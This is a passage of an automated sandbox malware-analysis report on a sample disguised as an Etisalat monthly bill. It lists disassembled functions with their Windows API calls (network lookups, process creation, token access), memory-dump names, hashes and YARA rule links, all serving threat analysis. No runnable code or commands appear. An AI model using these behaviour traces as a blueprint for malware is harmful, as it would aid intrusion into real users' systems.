                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                      • String ID:
                                      • API String ID: 1378193009-0
                                      • Opcode ID: 965c292ec8c61833a7812affe780e1314038a92c2fc027bfead4f7443a0b6d5d
                                      • Instruction ID: a45381ffa4e2191337f53f1185b5045761d7b176070e1b6bd37ddbcf71bfc24e
                                      • Opcode Fuzzy Hash: 965c292ec8c61833a7812affe780e1314038a92c2fc027bfead4f7443a0b6d5d
                                      • Instruction Fuzzy Hash: 67219570904784AFEB328B249895BE7BBECDF11304F0400DDE69E56281C7B85A859B51
                                      Function 00BD667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B65B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00BC7B20,?,?,00000000), ref: 00B65B8C
                                        • Part of subcall function 00B65B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00BC7B20,?,?,00000000,?,?), ref: 00B65BB0
                                      • gethostbyname.WSOCK32(?,?,?), ref: 00BD66AC
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00BD66B7
                                      • _memmove.LIBCMT ref: 00BD66E4
                                      • inet_ntoa.WSOCK32(?), ref: 00BD66EF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                      • String ID:
                                      • API String ID: 1504782959-0
                                      • Opcode ID: cf1faa74124cb2d74768b233a10510d4986694be46ffb90ff526552878d49383
                                      • Instruction ID: 536c123d088410dfb789f0fa55651d6da650e8de23400ea38f3164275142e117
                                      • Opcode Fuzzy Hash: cf1faa74124cb2d74768b233a10510d4986694be46ffb90ff526552878d49383
                                      • Instruction Fuzzy Hash: 2D112B35500509AFCB04FBA4DD96DEEB7F8EF54310B1840A6F506A72A1EF34AE14DB61
                                      Function 00BB9023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00BB9043
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00BB9055
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00BB906B
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00BB9086
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: dda6596a9d9cde02817ab19a341c90375b09678feb51297453ae5995ff9bcbdf
                                      • Instruction ID: afa87e18b5519779024873358736d4ef6f03062676f33823b929733f4fdbba5d
                                      • Opcode Fuzzy Hash: dda6596a9d9cde02817ab19a341c90375b09678feb51297453ae5995ff9bcbdf
                                      • Instruction Fuzzy Hash: 06115E79900218FFDB10DFA5CC84EEDBBB4FB48310F2040A5EA04B7250D6716E10DB90
                                      Function 00B61290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B62612: GetWindowLongW.USER32(?,000000EB), ref: 00B62623
                                      • DefDlgProcW.USER32(?,00000020,?), ref: 00B612D8
                                      • GetClientRect.USER32(?,?), ref: 00B9B84B
                                      • GetCursorPos.USER32(?), ref: 00B9B855
                                      • ScreenToClient.USER32(?,?), ref: 00B9B860
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Client$CursorLongProcRectScreenWindow
                                      • String ID:
                                      • API String ID: 4127811313-0
                                      • Opcode ID: 2b296a06062ea4c818ad3fc3f18db8577866e0ac31a4048686906dba6ee6c79e
                                      • Instruction ID: bc2eadc879c68c1ee3488db0319bc4c0abe0b5c28c2949a6d22597ff7854dbd6
                                      • Opcode Fuzzy Hash: 2b296a06062ea4c818ad3fc3f18db8577866e0ac31a4048686906dba6ee6c79e
                                      • Instruction Fuzzy Hash: B711287590005AAFCF10DFA8D8959BE77F8EB05301F0048A5F901E7150CB34BA518BA5
                                      Function 00BC1652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00BC01FD,?,00BC1250,?,00008000), ref: 00BC166F
                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00BC01FD,?,00BC1250,?,00008000), ref: 00BC1694
                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00BC01FD,?,00BC1250,?,00008000), ref: 00BC169E
                                      • Sleep.KERNEL32(?,?,?,?,?,?,?,00BC01FD,?,00BC1250,?,00008000), ref: 00BC16D1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CounterPerformanceQuerySleep
                                      • String ID:
                                      • API String ID: 2875609808-0
                                      • Opcode ID: 6b031a50fe69e8227b0add061a75755953652c23fc0a22e92c8cc499da16dacc
                                      • Instruction ID: 7bda5191a4a0d26d3bd596d1f8e6b0832c992fc5ab139fe8d4356b2ac533c415
                                      • Opcode Fuzzy Hash: 6b031a50fe69e8227b0add061a75755953652c23fc0a22e92c8cc499da16dacc
                                      • Instruction Fuzzy Hash: 7A115E31C0051DD7CF00AFA9D988BFEBBB8FF0A751F0545A9E941B6241CB309560DB96
                                      Function 00B97207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                      • String ID:
                                      • API String ID: 3016257755-0
                                      • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                      • Instruction ID: a044d3c3ad84bf15c1c421d5f80ccf5e24cc2d243157b7744ad7431d9f7b4e5a
                                      • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                      • Instruction Fuzzy Hash: C60140360A414ABBCF125F84CC41CEE3FA2FF5A355F5885A5FA1858031DA37C9B1AB85
                                      Function 00BEB57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowRect.USER32(?,?), ref: 00BEB59E
                                      • ScreenToClient.USER32(?,?), ref: 00BEB5B6
                                      • ScreenToClient.USER32(?,?), ref: 00BEB5DA
                                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00BEB5F5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ClientRectScreen$InvalidateWindow
                                      • String ID:
                                      • API String ID: 357397906-0
                                      • Opcode ID: 9c36512c257145ab2ad8bb35282ca619be3d3d5e7c393fb5120944989c7cd5b6
                                      • Instruction ID: caaed16be8be5f288c8f8b3ce01100bb444d054dfc8787a2bdcbd0b3bc61598e
                                      • Opcode Fuzzy Hash: 9c36512c257145ab2ad8bb35282ca619be3d3d5e7c393fb5120944989c7cd5b6
                                      • Instruction Fuzzy Hash: 311134B5D0024AEFDB41CF99D4849EEBBF5FB18310F108166E914E3220D735AA55DF50
                                      Function 00BEB8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00BEB8FE
                                      • _memset.LIBCMT ref: 00BEB90D
                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00C27F20,00C27F64), ref: 00BEB93C
                                      • CloseHandle.KERNEL32 ref: 00BEB94E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _memset$CloseCreateHandleProcess
                                      • String ID:
                                      • API String ID: 3277943733-0
                                      • Opcode ID: 1d846c27207fe8c51fcd80a65e482abad1d4f90cbdeaded308dcc40e6b292258
                                      • Instruction ID: 914fd10a8eb33fb119142040108e21e51359ab51eaa4a3f7b38daccb35f0ec45
                                      • Opcode Fuzzy Hash: 1d846c27207fe8c51fcd80a65e482abad1d4f90cbdeaded308dcc40e6b292258
                                      • Instruction Fuzzy Hash: 06F082F25583517BF62127A1AD85FBF3A9CEB08754F000160BB08DA9A6D7714D11C7B8
                                      Function 00BC6E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                      Download Yara Rule
                                      APIs
                                      • EnterCriticalSection.KERNEL32(?), ref: 00BC6E88
                                        • Part of subcall function 00BC794E: _memset.LIBCMT ref: 00BC7983
                                      • _memmove.LIBCMT ref: 00BC6EAB
                                      • _memset.LIBCMT ref: 00BC6EB8
                                      • LeaveCriticalSection.KERNEL32(?), ref: 00BC6EC8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CriticalSection_memset$EnterLeave_memmove
                                      • String ID:
                                      • API String ID: 48991266-0
                                      • Opcode ID: 719da82565f0b45c07278052c852947b9d5d0c196605aea08a2604983943257f
                                      • Instruction ID: c8f022bd4892d2f1d71e3ac9a4ff0a2a929b821be99237345bc88edea7bc2737
                                      • Opcode Fuzzy Hash: 719da82565f0b45c07278052c852947b9d5d0c196605aea08a2604983943257f
                                      • Instruction Fuzzy Hash: 79F0543A100200BBCF016F55DC85F59BB69EF45320B14C0A5FE085F226CB71A911CBB4
                                      Function 00BEC00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B612F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00B6134D
                                        • Part of subcall function 00B612F3: SelectObject.GDI32(?,00000000), ref: 00B6135C
                                        • Part of subcall function 00B612F3: BeginPath.GDI32(?), ref: 00B61373
                                        • Part of subcall function 00B612F3: SelectObject.GDI32(?,00000000), ref: 00B6139C
                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00BEC030
                                      • LineTo.GDI32(00000000,?,?), ref: 00BEC03D
                                      • EndPath.GDI32(00000000), ref: 00BEC04D
                                      • StrokePath.GDI32(00000000), ref: 00BEC05B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                      • String ID:
                                      • API String ID: 1539411459-0
                                      • Opcode ID: ce969ae60354a390f2d42a1abd00a274719a02bcf05a781fb9eb80b1d30df345
                                      • Instruction ID: 0d53c7a1ddbb5af946a0292900b4f2b747691eaec63eecf789dbaa133defdd70
                                      • Opcode Fuzzy Hash: ce969ae60354a390f2d42a1abd00a274719a02bcf05a781fb9eb80b1d30df345
                                      • Instruction Fuzzy Hash: 63F0823200129AFBDB226F55AC0AFDE3F99AF05311F044040FB11660E38B795662DFE5
                                      Function 00BBA37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00BBA399
                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00BBA3AC
                                      • GetCurrentThreadId.KERNEL32 ref: 00BBA3B3
                                      • AttachThreadInput.USER32(00000000), ref: 00BBA3BA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                      • String ID:
                                      • API String ID: 2710830443-0
                                      • Opcode ID: f10a86c210c1ab0f1f08455b194aaa0865940c9c287738f23edd886f2a30caf7
                                      • Instruction ID: 55b601a737c16296b98b459049582f7d28636d21faf50d9134e735d27afa1ad3
                                      • Opcode Fuzzy Hash: f10a86c210c1ab0f1f08455b194aaa0865940c9c287738f23edd886f2a30caf7
                                      • Instruction Fuzzy Hash: 82E0ED31545369BBDB205FA2DC4DEFB7F9CEF167A1F008065F5099A0A0CAB1C540DBA5
                                      Function 00B62218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSysColor.USER32(00000008), ref: 00B62231
                                      • SetTextColor.GDI32(?,000000FF), ref: 00B6223B
                                      • SetBkMode.GDI32(?,00000001), ref: 00B62250
                                      • GetStockObject.GDI32(00000005), ref: 00B62258
                                      • GetWindowDC.USER32(?,00000000), ref: 00B9C0D3
                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00B9C0E0
                                      • GetPixel.GDI32(00000000,?,00000000), ref: 00B9C0F9
                                      • GetPixel.GDI32(00000000,00000000,?), ref: 00B9C112
                                      • GetPixel.GDI32(00000000,?,?), ref: 00B9C132
                                      • ReleaseDC.USER32(?,00000000), ref: 00B9C13D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                      • String ID:
                                      • API String ID: 1946975507-0
                                      • Opcode ID: 17ab27f07df96425bf31929f69a28d22ad03c07f4da5f3e66b89538068545d67
                                      • Instruction ID: 5dc50abcea8ab50cd442388d158fdd3d3358a8e9cdea619751ee3a9a937ba42b
                                      • Opcode Fuzzy Hash: 17ab27f07df96425bf31929f69a28d22ad03c07f4da5f3e66b89538068545d67
                                      • Instruction Fuzzy Hash: EDE06531100185EAEF215F64FC4D7E83F54EB15332F0083B6FA695C0E18B714980DB12
                                      Function 00BB8C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentThread.KERNEL32 ref: 00BB8C63
                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,00BB882E), ref: 00BB8C6A
                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00BB882E), ref: 00BB8C77
                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00BB882E), ref: 00BB8C7E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CurrentOpenProcessThreadToken
                                      • String ID:
                                      • API String ID: 3974789173-0
                                      • Opcode ID: 0db59bc8f10802f28a4cbfcc13162dbe1011af8bafd1d82f0a43592ea600b023
                                      • Instruction ID: ebcf293b32296a5785024e503ccf70ec28db447a051b2023ccf4ee3a29d8bbe0
                                      • Opcode Fuzzy Hash: 0db59bc8f10802f28a4cbfcc13162dbe1011af8bafd1d82f0a43592ea600b023
                                      • Instruction Fuzzy Hash: 49E08676642252EBD7205FB07D4CBB63BACEF50792F054868B245CF041DE748441CB61
                                      Function 00BA2187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDesktopWindow.USER32 ref: 00BA2187
                                      • GetDC.USER32(00000000), ref: 00BA2191
                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00BA21B1
                                      • ReleaseDC.USER32(?), ref: 00BA21D2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CapsDesktopDeviceReleaseWindow
                                      • String ID:
                                      • API String ID: 2889604237-0
                                      • Opcode ID: 0c5c52f1e9f9af8b3ccc71130439d977b45e049d104a86a5213821d3e80f941c
                                      • Instruction ID: 1417645528ddd07c600ddbfd9e02b15c4d248d29a4b05a9254b715e43b9e7b87
                                      • Opcode Fuzzy Hash: 0c5c52f1e9f9af8b3ccc71130439d977b45e049d104a86a5213821d3e80f941c
                                      • Instruction Fuzzy Hash: FCE0E575800205EFEB019FA0C888AAD7BF5FB4C350F10C425F95AAB220CB388541DF40
                                      Function 00BA219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDesktopWindow.USER32 ref: 00BA219B
                                      • GetDC.USER32(00000000), ref: 00BA21A5
                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00BA21B1
                                      • ReleaseDC.USER32(?), ref: 00BA21D2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CapsDesktopDeviceReleaseWindow
                                      • String ID:
                                      • API String ID: 2889604237-0
                                      • Opcode ID: 4f0e217d33c42042dccbf29dc0a15a9f315565661b0a9e93341617735febcc4a
                                      • Instruction ID: 92fcf5e3e7abafdb2ffb6ac81b0687f4643df7c6acbf7a17f45303dd91e5494d
                                      • Opcode Fuzzy Hash: 4f0e217d33c42042dccbf29dc0a15a9f315565661b0a9e93341617735febcc4a
                                      • Instruction Fuzzy Hash: D1E0EEB580020AAFDB019FA0C8886AD7BE6BB4C320F108029F95AAB220CB389541DF40
                                      Function 00BBB7B6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OleSetContainedObject.OLE32(?,00000001), ref: 00BBB981
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ContainedObject
                                      • String ID: AutoIt3GUI$Container
                                      • API String ID: 3565006973-3941886329
                                      • Opcode ID: d4270fc94efdf199d01b9adecbcf6f6afc5ce2c78d851a7b393abc340f884162
                                      • Instruction ID: 2d01925d2c07bce4774c290d61763d639633661e4a04a1f71cf542d0f767efcb
                                      • Opcode Fuzzy Hash: d4270fc94efdf199d01b9adecbcf6f6afc5ce2c78d851a7b393abc340f884162
